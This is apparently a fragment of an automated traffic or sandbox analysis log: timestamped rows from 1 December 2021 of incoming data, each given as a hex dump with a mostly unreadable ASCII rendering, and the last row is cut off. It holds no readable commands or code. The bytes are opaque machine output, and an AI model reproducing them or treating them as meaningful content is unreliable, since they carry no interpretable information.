2021-12-01 18:10:27 UTC	132	IN	Data Raw: 2a 8d 14 9e b9 b8 cf 72 fe 2c ba 25 b0 80 df d0 a2 1c ee a2 3f 9d 60 1e cd 4d c9 7a 80 6c 51 4a fd ca bd 70 5a 28 22 7e 00 36 f3 3b ca b6 a5 b4 b2 7e a5 0f 10 c5 a4 61 f0 ec cf 01 8d dd 49 18 e4 76 bc 04 cb 10 48 23 eb ca 51 91 45 44 3b 20 74 37 4d 4c c5 b1 e7 0f a9 e7 0c 92 38 2d 71 d0 ec 11 78 b7 06 8c 12 ec 87 17 e8 0d 95 be 93 57 6f 70 ed 77 19 8b a2 dc c0 25 b9 0c 4e 82 77 d2 76 91 64 bb cf c8 c2 2c 0b 8b 54 70 3e 6c b4 41 27 5a 58 87 fb 66 54 6b b4 2e 9f 8d 6f 5f 60 c4 36 5d f3 31 f8 d8 ce d1 6e 0f c9 84 d2 c6 7a e4 7d b9 b5 dc e9 7b 91 ee 3c ab f3 b3 33 af cc 01 b7 a7 fb af de 6c a1 a0 5f 07 59 85 5d 6f d3 a5 51 cc a3 a0 33 a1 69 70 9f ba b9 96 93 f3 5f 1f 32 d9 65 db d5 19 55 9c 70 3b 70 7e 27 e9 ed d3 49 f0 59 30 16 43 72 02 c5 b0 87 21 f4 1e d6 Data Ascii: *r,%?`MzlQJpZ("~6;~aIvH#QED; t7ML8-qxWopw%Nwvd,Tp>lA'ZXfTk.o_`6]1nz}{<3l_Y]oQ3ip_2eUp;p~'IY0Cr!
2021-12-01 18:10:27 UTC	134	IN	Data Raw: d3 18 21 d2 4e 61 cb d7 35 69 ed ef 13 60 ed a9 74 b6 30 a8 c6 5c c4 20 05 45 70 08 bd 21 75 46 c2 13 41 a9 a9 f9 d0 cc f4 2c 1e 08 ea 06 9f f4 4c 75 3a ea f1 f8 22 b6 a0 36 be 79 ee f1 a5 f6 82 84 36 03 08 3f 17 8a 6e 43 74 d5 f4 1a ca d1 aa 56 39 da 64 d3 f6 c6 3c 5d f6 87 5e 6e 27 32 2a 6c a7 ea 0d c8 4a 13 38 94 c2 9b b1 bc df 2d 2e 3b ac e9 17 eb 28 ef 4d 0d be c5 da f7 2f 5e 59 26 d1 8d c8 7a 2a ef 29 ab 37 2e 97 42 ea de 75 3f bf 2d 94 48 ad ca 0d 51 25 dd 78 3c 02 a9 fe 40 67 25 7a da a3 90 5a 8b 5c 36 25 5f 4a 09 eb ed 1c 3b 95 86 56 50 25 a1 bf 09 50 7e 70 07 ec 1d ca 12 3a 4c 16 8f 10 e3 98 32 18 8b 35 7f 83 a8 19 3b 3d 3a 16 20 41 76 c1 f1 7e cd b9 14 f9 b5 90 84 ce 9d 08 2b d5 d3 0b c9 fd cf 51 ac b3 28 05 1e e4 c8 6f b9 e3 58 96 68 0f 55 4c Data Ascii: !Na5i`t0\ Ep!uFA,Lu:"6y6?nCtV9d<]^n'2lJ8-.;(M/^Y&z)7.Bu?-HQ%x<@g%zZ\6%_J;VP%P~p:L25;=: Av~+Q(oXhUL
2021-12-01 18:10:27 UTC	135	IN	Data Raw: a0 bd a7 81 d1 13 a8 82 ab 10 63 14 bf fe b2 26 99 68 e0 52 f9 e2 d9 38 10 63 d7 db 38 43 55 0a 3e 53 9b 81 c4 a7 51 25 8d 4e 4d e7 5a 86 f7 dd 7a 17 33 0f b6 f5 cd 25 90 aa fe c8 cc 4d 7e 92 88 48 23 39 dd fd 99 81 b6 09 97 ea 8d b3 88 34 69 99 fb ce e8 db 9b 8e 2e 82 55 ff 93 a3 3c e2 8c 0b 8f 77 36 ff 6b e1 51 a8 ee 29 f9 7a b4 20 51 ae 2c 02 3a 9b 13 de b0 c9 bb 43 92 92 3a 84 02 1e e5 fc 6e d8 c1 d2 1e a3 da c9 66 7b 5d 3a 7e 72 e4 48 27 cb 15 75 bc 54 f8 3e f8 66 11 6d 29 d0 bf e7 2f c4 dd 21 90 27 0f 73 7f 90 88 7f 9d 84 d2 7d ed 87 13 52 6e b9 af b5 ed bc 5d ff 51 19 d5 ad dc c0 1f 0a 33 4c 82 6e db dc c2 ff ba c9 e6 64 a5 92 8a 54 ee 3b 06 a4 67 07 37 7d aa e9 60 68 22 b5 2e 85 85 fc 4f 60 c2 03 fb a5 85 fb d8 cc db 10 71 50 85 48 e7 77 bd 5a 99 Data Ascii: c&hR8c8CU>SQ%NMZz3%M~H#94i.U<w6kQ)z Q,:C:nf{]:~rH'uT>fm)/!'s}Rn]Q3LndT;g7}`h".O`qPHwZ
2021-12-01 18:10:27 UTC	136	IN	Data Raw: 43 d1 b3 13 06 05 7f f2 1b 57 a6 56 28 85 31 18 15 3a 6f 0e 02 6c 2b 5f 6f 35 b0 05 51 6a 7d 8a db e8 09 7c 84 cc 3c 02 28 ff ac 65 dc 23 88 2b b6 1f 92 0a 77 aa 25 67 67 50 2d b0 a6 a6 13 55 ab 0a d0 5c a0 c2 ff 08 b1 95 85 51 8b 54 0d 25 f2 4a 48 e6 d5 af 4a ea 7f 4b d9 f6 a8 70 96 7a b8 d6 5c 5e 1a 38 7c 7b 2a d7 26 5f c4 9c 04 55 a9 ad c3 e3 e0 f6 2c 82 07 45 69 20 d5 57 70 1a 81 d0 d9 32 2c 85 05 87 72 cc 9a a2 dc 04 da 3d 17 08 3b 2d be 42 41 74 49 fb b5 a6 6e 8b 4a 3c fa 08 f2 df d6 a6 78 c4 b7 50 63 49 33 2c 46 01 02 81 c9 4a 0c 30 a4 c1 9b b7 0c 7c 7e a5 1c 8c f0 36 86 29 cf 07 87 9b e8 d7 d8 27 1e 5a 26 d7 87 d5 11 b3 ee 36 a4 3f 1d 94 42 ec 6e d6 6c 34 0a b4 52 8c a4 0c 71 76 57 5d 11 0f 9c f6 03 64 25 7c d0 87 fb c3 8a 43 3e 2d 6d 49 09 ed 5d Data Ascii: CWV(1:ol+_o5Qj}\|<(e#+w%ggP-U\QT%JHJKpz\^8\|{*&_U,Ei Wp2,r=;-BAtInJ<xPcI3,FJ0\|~6)'Z&6?Bnl4RqvW]d%\|C>-mI]
2021-12-01 18:10:27 UTC	138	IN	Data Raw: 82 00 f8 57 ef a2 6c 1b ab 8f 42 2c d6 b8 b2 df e6 70 4a fc 45 a9 07 fe b9 1f f1 2f 39 b4 15 4a 1c 57 5f d9 62 84 be ab 6d 7a 79 4d 32 43 92 1d 7d 31 ff d7 33 c9 14 e9 6e f3 85 48 e5 03 58 6f 7e 11 fd d9 bd 43 8f f8 04 05 6a 84 35 9e b8 98 a5 f1 85 83 04 d5 a9 ac 03 bb de ec 2e b1 45 78 77 d2 da 79 66 c8 63 d7 df 38 2f 45 0a 3e d6 9a 84 fb 83 71 b2 a6 c8 33 5e 8c 91 f3 fd 27 18 1b 22 2e d0 e6 1d 30 f4 25 c8 cc 49 7e 21 9b 48 23 bc eb f8 a6 a5 96 9d bc 6c f3 0a 6c 23 6d b9 a7 c3 c0 f6 03 ab 05 ba f1 a1 49 a3 3c e6 8c ac 9c 77 36 7a 6a e4 6d 8c ce bc d2 fc ca 99 a1 b9 28 22 67 b2 3e dc 2a ea bc d3 ca 2b 7f 85 06 3e 51 a5 7c d8 5b e8 2c 9a d1 eb f2 7c 77 bc 20 1f f2 48 23 f0 78 59 be 54 64 31 57 0a ae 4c 6c d5 9f 72 0e b3 cf bb b5 15 3a 7d 72 07 89 79 b7 22 Data Ascii: WlB,pJE/9JW_bmzyM2C}13nHXo~Cj5.Exwyfc8/E>q3^'".0%I~!H#ll#mI<w6zjm("g>*+>Q\|[,\|w H#xYTd1WLlr:}ry"
2021-12-01 18:10:27 UTC	139	IN	Data Raw: 9b 9a ed 3a 7d 0d a4 8b 53 7c b6 ac de ae e9 fa bb fe 0c 92 14 54 0d 16 85 33 29 ea 5e a4 00 95 73 09 35 8d a7 b8 e6 86 72 fe c1 bd cd 85 eb 7c 02 ec 9d d4 ab a4 d3 76 a1 7a bf 5c df 98 57 bc a1 f7 1b ca c7 74 7b 40 75 d2 c9 82 00 d9 6e bb 2f 31 03 38 44 1a 57 86 01 50 9c 31 05 2a 3f 40 0c 04 40 83 a3 88 ad b1 01 75 22 c4 8b db 72 b6 74 b8 fb 3a 4a 91 fe ac 45 82 58 91 2b a8 2b 97 25 75 ac 09 cf 9b b7 b5 b1 a2 82 5a ed aa 0a 4a e3 a8 fe c8 0e f8 2d 84 51 ab f2 6c 3c f2 54 7d e3 fa ad 4c c6 d7 b7 3e 6e a9 74 b2 30 03 d7 5c c4 a5 30 40 4c 2c 9d 9d 5e c4 bc aa 3b b0 ad d9 d7 e5 d9 2e 84 2b ed 95 c7 4d 56 74 3e ca 6a d8 32 b6 3a 0d bb 45 ca d1 18 dd 04 fa 8f 83 11 3b 37 8b 47 6e 76 4f d7 1d 5e 89 13 4b 38 de 44 4f de d6 3c c7 cc 8b 64 65 05 8e 2d 46 21 b4 1c Data Ascii: :}S\|T3)^s5r\|vz\Wt{@un/18DWP1*?@@u"rt:JEX++%uZJ-Ql<T}L>nt0\0@L,^;.+MVt>j2:E;7GnvO^K8DO<de-F!
2021-12-01 18:10:27 UTC	140	IN	Data Raw: 89 f4 31 6d 95 3c 83 4b 0e 59 7f 49 b1 65 c9 d8 73 af 9e f7 a9 b8 61 54 31 5a a4 1b ed ed 66 2e 01 99 ad 93 3b 0c de 34 fb 72 c2 93 06 32 87 ad 37 7a 85 b8 47 14 29 f2 54 6a f6 db eb 0d da 5c 1f 94 79 ab 26 f1 b9 88 a8 e2 38 d5 df 19 25 d1 65 47 83 b2 1a 31 aa 4f 0d eb 98 3c c1 ed 58 47 4c 52 af 2d 67 ce ae dd 2d 3d 92 e0 cd 62 ce c4 fc 4b b6 17 8a b2 7b e3 68 3f 6f af 3d f2 2f ef ff 3e 70 03 ef 44 6a e8 f9 c9 01 5c 49 b4 96 83 40 26 66 a6 ca b2 24 8a 85 af bb b5 c4 98 d1 15 9d 27 fd a4 60 14 bd f4 71 59 00 69 7a 73 f4 11 fe 18 51 f8 f2 f6 09 98 64 eb 3f 4c bf 89 98 be 51 23 be e0 1e 7c 5b 80 d9 7f 46 8f 32 0f 28 f0 02 36 b6 8a 26 ec e1 5c 78 93 78 49 23 26 ee a1 af 83 b6 12 95 41 f1 2a 8f 1e eb c7 21 ce e8 df 21 48 02 90 73 45 f5 8f 2e c4 8c dc 9c 77 36 Data Ascii: 1m<KYIesaT1Zf.;4r27zG)Tj\y&8%eG1O<XGLR-g-=bK{h?o=/>pDj\I@&f$'`qYizsQd?LQ#\|[F2(6&\xxI#&A*!!HsE.w6
2021-12-01 18:10:27 UTC	141	IN	Data Raw: cf a2 70 7a b1 ca 12 a8 f1 aa 1b 18 eb 2c a0 ab 59 d2 45 6d a1 84 9c e2 59 85 41 dd db 8a 40 ec a9 df 4d 38 68 50 b8 94 bd 94 8e db e8 38 1f cd 69 79 af 82 54 9c 54 f2 96 7e 27 f6 7c de 49 e3 7f 16 c6 c1 0c 9b e4 9a 8d 01 f1 01 fe b1 82 b6 8e 6d 2b 80 ae e4 7d b6 8c b0 97 c4 eb 86 f6 94 91 14 52 07 f0 e2 aa 28 f6 72 a9 04 97 75 23 2d d6 13 ab c0 a2 54 4a c0 bd ed e6 d2 51 13 d5 b1 4a 87 a6 d3 50 ed e5 c1 c5 c3 b0 7e 9e a6 f3 31 48 23 c8 57 52 57 d2 79 81 00 d9 d4 9b 1f 20 25 07 e5 33 7a 84 21 3b af b3 7b a4 16 6d 0a 24 4e ab 21 f6 ae 95 2c 60 24 5c 82 d9 72 2c 71 8e f7 1c 6a 37 d7 81 47 a2 30 a2 ad d6 ae be 08 73 8c 06 e7 19 c9 b6 95 8f 94 5c 74 a2 08 4a 79 ad f0 c4 28 d8 8b 8e 79 86 d0 18 23 d8 d2 1e 52 d6 af 48 e0 f7 37 40 f7 32 51 9b 02 9f f6 56 c6 3f Data Ascii: pz,YEmYA@M8hP8iyTT~'\|Im+}R(ru#-TJQJP~1H#WRWy %3z!;{m$N!,`$\r,qj7G0s\tJy(y#RH7@2QV?
2021-12-01 18:10:27 UTC	143	IN	Data Raw: 26 6c ac 8d 74 4f 22 8b 39 57 af 6f 70 03 d7 1f e5 10 3a d0 19 24 7c 5c b9 18 1e ab 15 5e 6a b7 83 1e 0f 70 18 2d 63 77 c7 db d8 d8 30 15 f9 ae bf 87 e1 9f 08 b7 da 7c 67 76 dc e4 57 8c 92 09 44 3e 7e ed 5d f0 ed 55 b5 69 09 7f ee 75 13 a9 6c 91 18 8f 95 0f 59 e5 f6 b9 59 fe de 7f 71 9f f7 89 01 71 4f 31 41 9b 1e c2 ef 60 02 ad 65 4a 0b 3a 08 fa 39 24 73 c2 09 b9 3a b8 9a 31 77 5a b9 47 34 97 e3 4f 6a e9 ce eb 0d da 5c 1f 94 79 ab 26 f1 b9 88 a8 12 3b d5 df 19 25 d1 65 47 83 42 19 31 aa 4f 95 d0 98 3c c1 eb 58 47 4c 52 af 2d 67 ce ae dd 2d 3d 92 10 ce 62 ce c4 fc 4b b6 17 8a 42 78 e3 68 3f e9 94 3d f2 2f f2 ff 3e 70 03 ef 44 6a e8 f9 c9 01 5c 49 64 95 83 40 26 66 a6 ca b2 24 5a 86 af bb b5 4f a3 d1 15 9d 09 fd a4 60 14 bd f4 75 59 00 69 7a 73 f4 c1 fd 18 Data Ascii: &ltO"9Wop:$\|\^jp-cw0\|gvWD>~]UiulYYqqO1A`eJ:9$s:1wZG4Oj\y&;%eGB1O<XGLR-g-=bKBxh?=/>pDj\Id@&f$ZO`uYizs
2021-12-01 18:10:27 UTC	144	IN	Data Raw: ac e4 cc 59 35 72 28 a7 8b 9d 5a 9b 70 eb 5d bf ed 35 dd c0 3b b1 70 4e 82 71 62 d1 c2 ef 9c ef 9d e0 db 0b ab 56 c9 1b 41 ba 6c 2f 80 5a 87 fd 6c ce 1b 2d 2f 85 a1 62 0f 62 c2 1c 45 a8 85 eb fe ea a3 94 0f c9 a4 45 c0 57 f5 44 83 65 f1 eb 7b b7 e4 b4 d5 6a ab 1b 86 ee 52 b3 8d 79 4b 62 40 b3 82 5f ad 5b 85 5d d5 d1 ab 40 ea 9c 41 1b 8c 6b 50 ba 9e 3f e8 17 da 72 19 12 8b 4d 59 ab 1a 71 b1 66 3d aa 2a 25 e9 77 d6 5b c2 7f 10 f3 57 5a 2f e7 9a 8f 0b 76 7d 67 b0 18 97 83 29 0f a0 ab 7c 58 9b bd 62 ab 91 e9 9d de 99 c0 37 54 2d 68 b4 1e 2b f6 70 a3 84 eb ec 22 b7 f7 1e ef e4 82 52 d2 e5 90 df 39 ee 07 11 ca bd 42 f1 87 d3 56 d8 7b 97 71 c0 b0 7c 94 27 8f a8 49 b9 e9 5a 17 73 f2 7e 19 25 f4 e6 b8 22 77 27 18 f3 3b 24 a5 21 3d 9a 21 2d 10 15 6d 08 2e c0 d7 b8 Data Ascii: Y5r(Zp]5;pNqbVAl/Zl-/bbEEWDe{jRyKb@_[]@AkP?rMYqf=*%w[WZ/v}g)\|Xb7T-h+p"R9BV{q\|'IZs~%"w';$!=!-m.
2021-12-01 18:10:27 UTC	145	IN	Data Raw: c9 4a 8d 3d a4 d1 bd 91 51 f8 00 3c 3d b9 d1 16 eb 37 df 2f 30 bc c5 c3 d4 81 0d c2 27 d7 a3 6e 7c b1 ee 29 35 32 1d 84 64 ca 3c 52 12 ad 2b f1 73 ac ca 12 50 5e e0 7a 3c 1b 90 50 13 fc 24 7c f4 01 97 c1 8a 5c a8 20 6d 59 2f cb 0e 3b 16 84 80 10 6a 24 a1 a0 20 1e 43 72 07 f1 1f 61 6e a3 4b 3c 0d 4e 00 9b 32 1c 31 30 53 91 8e a3 64 12 28 30 20 0e 52 c1 f1 41 87 81 39 fb aa 99 86 65 e1 91 2c ff 55 55 2b fe cf 55 16 b7 04 17 38 5e 96 40 a8 c5 58 27 4c 0f 55 73 23 a2 85 6e 95 3e 89 15 71 c0 7e d3 90 68 a4 fc 53 73 05 d2 84 89 77 6f 4d 58 b3 33 e0 57 43 28 2b 0c fb 27 38 0c dc 3e a4 0d 5b 92 9c 13 8a c1 13 5a 58 23 62 39 18 e5 6f 17 f4 c3 c3 00 61 79 19 be e8 fd 92 f2 b9 8a a2 ba 47 4c de 83 04 dc 09 63 a3 6c 81 14 87 7d 18 d0 e6 3e de e6 50 d0 6b 52 a9 18 ee Data Ascii: J=Q<=7/0'n\|)52d<R+sP^z<P$\|\ mY/;j$ CranK<N210Sd(0 RA9e,UU+U8^@X'LUs#n>q~hSswoMX3WC(+'8>[ZX#b9oayGLcl}>PkR
2021-12-01 18:10:27 UTC	146	IN	Data Raw: 0e 00 66 24 23 f6 34 2a 24 5c 10 5a aa 56 70 2c 51 b5 7f 3a 6a 29 e0 ba 6d 8f 34 88 2d 82 b1 c1 91 76 ac 0b c5 97 cb 2c b0 38 a3 57 46 8d 2a c4 7b 8d d3 f9 83 fe 94 85 4e be fa 35 27 f2 52 4a 49 a9 36 4d c0 f9 15 cf f5 a8 74 2c 35 94 c7 7a e4 b0 17 6d 5d 2a 7d 01 5f c4 ab a2 6d ab ad df e1 4f 8a b5 85 2d c3 37 29 d6 57 74 a0 cf fc c8 14 96 30 2a 96 54 cc 30 85 dc 04 e2 87 2f 0a 3b 31 bc ed 3d ed 4e d1 33 f8 66 88 4a 38 40 41 de ce f0 1c cc eb a6 76 63 e6 14 2c 46 36 bc b9 cb 4a 11 32 0b bd 02 b0 26 fe 20 ae 1f 8c f4 8c ce 05 de 21 3d 2c c7 c5 fe 27 b7 7d 26 d7 bf 66 29 b1 ee 2f 85 95 4e 0f 43 ea 40 70 81 af 0b b4 cc 89 e7 1c 57 56 5e 7a 3c 1d 9a 10 4b 65 25 6b d8 0c ec c3 8c 76 b0 7b d9 4a 09 ef 57 ad 14 84 a0 ec 6a 09 b0 99 09 a2 6c 70 07 d7 f2 c1 10 3a Data Ascii: f$#4$\ZVp,Q:j)m4-v,8WF{N5'RJI6Mt,5zm]}_mO-7)Wt0T0/;1=N3fJ8@Avc,F6J2& !=,'}&f)/NC@pWV^z<Ke%kv{JWjlp:
2021-12-01 18:10:27 UTC	147	IN	Data Raw: 4e c8 8c 2a f3 96 17 68 2f 39 b2 1f 2c 45 ce 5e c6 6b 8c 1c a8 6d 7c c9 ea 61 c8 b5 3d f6 10 4a d5 13 72 99 cc 43 fd b0 40 7d 03 58 69 74 7a a4 40 bc 5a a3 f5 96 04 6c ae 2d c5 0c 8b 83 d5 35 34 06 d5 89 f8 31 96 cf d5 07 2f 6a 7a 77 f4 00 d8 18 51 7b ff f6 1a be 42 20 b8 32 26 a8 e9 a1 71 94 a5 c8 33 e4 7e ab e1 db 18 a1 31 0f 2c f0 13 10 b6 8a a3 c0 e4 60 5c b3 9c 62 a1 58 57 d4 b4 87 96 b7 bf 6c f3 b0 ac 19 7c 9f 98 77 ea db 01 8b ff b7 73 df ce 8a 11 e0 ac 39 b7 f1 48 79 4e c9 78 8a 57 2d d3 fc 50 9c 7d bc 0e 02 c7 98 13 de 0a e8 be 51 b4 ad 72 ad 2f 1c c5 a2 56 5e bf 54 00 8b f3 eb dc 7f 77 bc 9a ce c8 5a 05 cb ea 76 bc 54 42 0b fd 74 37 52 65 f9 92 e5 0f b5 e5 a7 ee a1 2a 5b 56 b2 33 7b b7 02 36 c1 c1 95 31 52 93 ba af b5 57 80 58 ed 77 26 9c 84 f1 Data Ascii: Nh/9,E^km\|a=JrC@}Xitz@Zl-541/jzwQ{B 2&q3~1,`\bXWl\|ws9HyNxW-P}Qr/V^TwZvTBt7Re[V3{61RWXw&
2021-12-01 18:10:27 UTC	148	IN	Data Raw: ed 8d 55 2d 72 bc e8 2b f6 76 13 27 b8 67 05 97 28 3c b9 e6 a2 74 63 c0 bd d2 15 e6 7c 11 ca bb 48 2c da 4a 57 c7 67 9f 80 c0 b0 7a 24 84 dc 23 6e 99 31 78 40 71 d2 4e a8 00 d9 eb ba 2a 0d 27 18 f5 31 d1 f8 b8 3c 85 35 25 e0 15 6d 0e 9e 63 84 33 d0 14 6d 03 71 02 5c de f0 72 2c 4e 9c c2 31 68 29 f9 86 c3 dc af 89 2b ac 17 61 0a 77 ac 95 c0 34 db 0a 90 7c 84 7a 54 8b 57 61 79 8d cc d2 00 f5 96 85 57 81 54 66 bc f3 54 64 eb 08 ad 4c c0 67 10 6d e5 8e 54 69 12 b9 d6 7c ac 14 15 6d 42 05 95 0a 5d c4 ba a0 c6 d7 34 d8 cb c9 d4 cc 86 2d c7 8d 9c f9 45 52 1a 0a d3 d9 32 96 d7 03 96 54 f3 fd 8b f1 06 fa a9 28 8e 45 ae 97 6f 47 54 ae d3 37 d8 6d af 67 2a fc 44 12 dd d6 3c 7d 6a 8d 76 43 3a 16 04 6b 23 94 92 e3 c8 69 81 88 c3 9f 91 c4 f8 00 3c 87 a9 d9 07 cd 08 2d Data Ascii: U-r+v'g(<tc\|H,JWgz$#n1x@qN'1<5%mc3mq\r,N1h)+aw4\|zTWayWTfTdLgmTi\|mB]4-ER2T(EoGT7mgD<}jvC:k#i<-
2021-12-01 18:10:27 UTC	150	IN	Data Raw: df 84 9a 51 49 1b d8 cd aa c1 ef 62 08 29 18 d3 0a a0 29 f7 05 00 53 c0 90 9c 17 8a 94 3c 5a 58 a7 6f 39 0b c3 49 40 70 bd 5a 21 d8 58 39 bd fc d5 bf 6a 9c a1 9a 1a 19 d6 dc 83 00 dc 47 4c a3 6c 04 20 82 42 3c f0 9e 16 58 98 e9 6b 4e 56 89 03 e2 b0 37 46 08 14 a0 19 ec 66 cd 5e d9 46 e5 1c aa 6d 65 f2 40 32 53 b4 3b d8 b6 81 4e 12 72 07 c9 6b ef 96 60 52 24 75 7b 72 b7 86 43 bc 43 ab 8a b9 04 6a 9b a0 93 b8 88 83 d7 3f 04 7a 4c 88 62 10 9b d8 f0 27 99 f2 5f 5a c6 d6 df 1e 52 62 d7 fb 79 93 44 0a 21 43 97 84 eb a5 57 09 25 b6 aa 7f 5b 82 d3 fa 3b 16 33 95 09 fd f1 11 96 8d bf c9 cc 6d 2e 9e 9a 48 3d 0e e3 d7 b4 85 9c 8d c3 f5 f2 2a 8d 14 65 ba b8 cf 72 fe 2c ba 25 b0 7b dc d0 a2 1c 9a 81 3f 9d 6b 1e cd 4d c9 7a 80 68 51 4a fd ca bd 70 a7 2b 22 7e 00 36 f3 Data Ascii: QIb))S<ZXo9I@pZ!X9jGLl B<XkNV7Ff^Fme@2S;Nrk`R$u{rCCj?zLb'_ZRbyD!CW%[;3m.H=*er,%{?kMzhQJp+"~6
2021-12-01 18:10:27 UTC	151	IN	Data Raw: 81 4b 4e 92 0b 82 53 80 25 35 38 8d 57 69 a1 d5 16 84 bc 2f 26 7c 32 2d 19 fa 94 f0 54 c7 95 20 0a 9d 0a fd a3 1d e8 b2 7f ee 6a e6 62 e3 88 79 d5 f2 9e 40 3f 6e 92 53 bc 61 3f 89 13 3c 93 a1 17 0a 44 f4 0e 06 f8 30 75 44 28 63 1e 2a a8 e3 9d c7 66 73 72 bb 38 88 41 d6 3f 2f e0 be 6f d4 8d ed 3b 2d d5 ed 80 4c 9d 51 46 8c e3 3e a5 ae cb 0a 86 04 d8 6a 87 d1 12 c6 c9 8b 46 67 d0 9f 10 28 2f b5 31 f2 74 a2 d1 a2 52 7f 19 6c 86 22 39 eb 4d 2e ce 11 24 69 15 6c 59 15 56 9c 33 f5 21 f4 2a 6a 14 61 c9 85 4e 3f 41 97 ec 18 7e 2d a8 96 51 85 18 fa 42 a9 2b b5 30 59 83 01 c5 32 eb 52 d5 bb 8d 77 37 d5 07 57 69 e5 a0 c0 29 ae 82 b5 60 73 1c c3 ff 66 db 82 03 02 2c cc 33 3e f1 8b 24 77 bd 6b cd 26 3c 93 1c ff 86 93 8d d1 6f a9 ca 01 64 44 bc 4b 4e 1b 27 22 12 d9 6b Data Ascii: KNS%58Wi/&\|2-T jby@?nSa?<D0uD(cfsr8A?/o;-LQF>jFg(/1tRl"9M.$ilYV3!jaN?A~-QB+0Y2Rw7Wi)`sf,3>$wk&<odDKN'"k
2021-12-01 18:10:27 UTC	152	IN	Data Raw: ed bf 97 f8 d1 32 96 a3 13 b2 ce 2b 01 3e a9 ba 88 99 ae d6 d6 62 6f ce 25 2a 80 41 04 11 31 7d 07 a5 92 58 d1 fa c3 7f 4e c5 19 1b 9b a9 a2 d3 62 f1 07 63 fe 14 dd ab d2 ef 9d cf f1 21 fa 42 dc cc 47 19 2c 92 db 0b 93 f6 54 3a c9 bb e0 c0 1a 03 59 3a cc 39 d1 f9 71 3c 3e 31 8d 71 56 70 bb 79 46 14 fb b3 cd 70 de cb 63 2f 31 c5 64 2a 57 af 22 14 8c b0 b3 42 a6 27 62 ee b4 e8 84 d2 ec b5 96 3b 28 db df 88 02 a2 42 7a ab 67 15 20 a7 77 79 c3 9b 3c c3 f9 64 7f 4f 71 8d 21 92 ae 2f cf 60 0f 90 12 ec 57 ef 6f f0 53 8f 29 90 40 44 c9 54 3f 61 97 0d d4 06 cc fb dc a1 db 32 a5 30 49 e3 02 d7 aa a7 88 43 49 9c 69 91 07 53 47 da bf 55 33 6b 56 5a 43 07 d3 54 fd 3f 71 8a fd 4d 37 06 d5 68 8d 88 82 7d 1c 0f e9 af 96 38 2c e9 4e bc fd c1 b9 4b 0a 4e 01 84 ae 21 41 b3 Data Ascii: 2+>bo%A1}XNbc!BG,T:Y:9q<>1qVpyFpc/1dW"B'b;(Bzg wy<dOq!/`WoS)@DT?a20ICIiSGU3kVZCT?qM7h}8,NKN!A
2021-12-01 18:10:27 UTC	154	IN	Data Raw: 56 fd 52 c9 b9 31 fe 02 46 1f 1f 1e 63 62 57 23 f0 29 fe 5e b4 b9 1f d6 b4 1e f7 68 0a b5 a9 83 01 9b 66 b9 4b 4b 32 aa 06 8e 9c a5 bc 97 85 a3 8f 17 8a d1 1d af 4e a8 0b c9 1f 9c e7 69 a3 c8 35 fd a7 96 26 a8 f9 74 f8 b7 09 ef 6b 0b cf cc 0c c4 60 f9 29 83 9b b6 3c 99 f2 24 52 8c 5a 65 9b 90 ce 9d d3 85 39 4d 26 f5 15 46 f4 cf 53 95 7d 0b d1 38 3a fe 60 fc 3b fe 6d 0e f0 41 3e 56 b1 de cc 09 de 7d 81 dd 69 a4 a8 06 33 dc c5 c6 55 9c 9d 20 ec fa dd ad f5 c5 ad 29 6b 12 55 f7 46 5e 93 ec 40 cb 0a ed ae 25 25 da 23 3b 1f db 89 0b 76 03 9a 4a 8e c2 1b 75 ff 7b 78 0f 88 03 e9 29 ca 78 0b 90 56 19 48 9f fb 40 28 cb f1 8a 49 d5 60 f5 2c 18 39 a0 d9 d6 eb 15 a8 a4 78 db c5 63 99 cd f5 cf b4 82 8a 9c 72 e1 2b af 17 d6 a7 9b a5 5f 46 e5 bb db 54 2a 87 f7 b4 7b 7d Data Ascii: VR1FcbW#)^hfKK2Ni5&tk`)<$RZe9M&FS}8:`;mA>V}i3U )kUF^@%%#;vJu{x)xVH@(I`,9xcr+_FT*{}
2021-12-01 18:10:27 UTC	155	IN	Data Raw: ab b2 14 78 64 4a 89 d3 ed 9e 77 e8 13 1d aa b6 37 b2 75 62 d0 10 aa 42 24 42 e9 53 e3 0b c9 b8 5d 2e 2a 93 6b 5f 58 ed 95 3c 72 4a 19 9b 5a 99 bc f2 34 54 59 2b 2f 76 ce 49 1e 24 b1 92 50 78 19 e1 e6 5e 43 1f 14 7d 94 7d be 15 36 4b 3b 47 45 77 80 31 23 87 1b 7f 8d a2 c6 20 0a 24 28 22 59 64 d3 e4 41 b3 84 21 e6 ac 85 8b cd 8b 14 10 d5 6f 18 56 de fb 75 96 b9 02 27 2d 4b c6 56 97 f0 4b 98 76 35 6b 52 2f ef ba 08 7e a5 3e 0e 95 db e3 48 02 da 55 6b c1 97 7d 7f 2b 61 ab c3 a2 d6 39 bf 40 18 ee af a8 ea 55 fa 85 d0 3b f3 cc 93 39 6d 3e c7 4f 5e e2 af b9 1c 93 e0 e5 3f e2 b6 29 1a 64 87 71 f4 a2 11 5c 01 6d 36 65 27 57 e3 f8 79 0f 51 d5 30 a7 b6 7f b1 d9 f2 16 d2 f3 4d 51 f4 7b 7c ee ff d7 d2 2e d2 7c 1e 9d 35 b3 97 0d 81 79 ce 7c fb 3f e2 12 91 14 d3 cc 4e Data Ascii: xdJw7ubB$BS].*k_X<rJZ4TY+/vI$Px^C}}6K;GEw1# $("YdA!oVu'-KVKv5kR/~>HUk}+a9@U;9m>O^?)dq\m6e'WyQ0MQ{\|.\|5y\|?N
2021-12-01 18:10:27 UTC	156	IN	Data Raw: 20 f1 ef 44 d3 a4 1a 90 14 00 a4 f4 3d 87 87 88 53 db a3 b5 0c 5b 1a d0 6e 92 9c 25 46 82 3d 1e fd 31 0b 6a a1 02 0e 11 01 a2 d5 86 79 d1 ad 43 e6 5e 4a 61 4b 95 87 7e b4 0b fc ae d4 a6 5b 6e 7f f1 f3 93 23 bd 27 ce 23 6c ac bf cc db 2b 89 32 05 df 60 f2 91 dc 83 d8 ba dd 8f c4 65 e7 4f 86 76 58 8c 59 2b 80 6f b6 c0 68 34 5f 8a 16 8f b1 7a 69 bd 1a 99 1b 42 6e 39 29 0b 3e 57 d9 1c 51 8f 36 8c 3d 90 4b 96 1a 65 ab 62 0e f6 7f 37 42 df 56 37 f9 49 6c 85 3f b8 85 7c 54 9e 13 ab 3f f1 5e 47 3a b5 12 6e b2 ca 4e a4 b3 4d 56 5c 71 72 3c f9 85 bf 69 d1 d4 2c 09 d0 4d cb 88 03 ec ad 68 fe 30 b4 36 aa c6 65 cd e5 ae 78 0a 0c a2 65 84 6b 0a b1 29 1e c3 a9 1f 08 56 d8 4a 42 ad 64 28 6d 27 65 03 22 be e6 84 d6 2c 90 95 54 